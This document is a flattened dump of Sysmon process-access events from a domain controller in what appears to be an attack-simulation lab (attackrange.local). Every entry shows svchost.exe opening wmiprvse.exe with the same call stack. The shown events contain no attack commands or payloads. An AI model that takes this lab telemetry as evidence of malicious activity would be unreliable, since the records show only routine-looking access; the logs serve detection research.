13:58:15.930{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.930{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.930{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:15.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
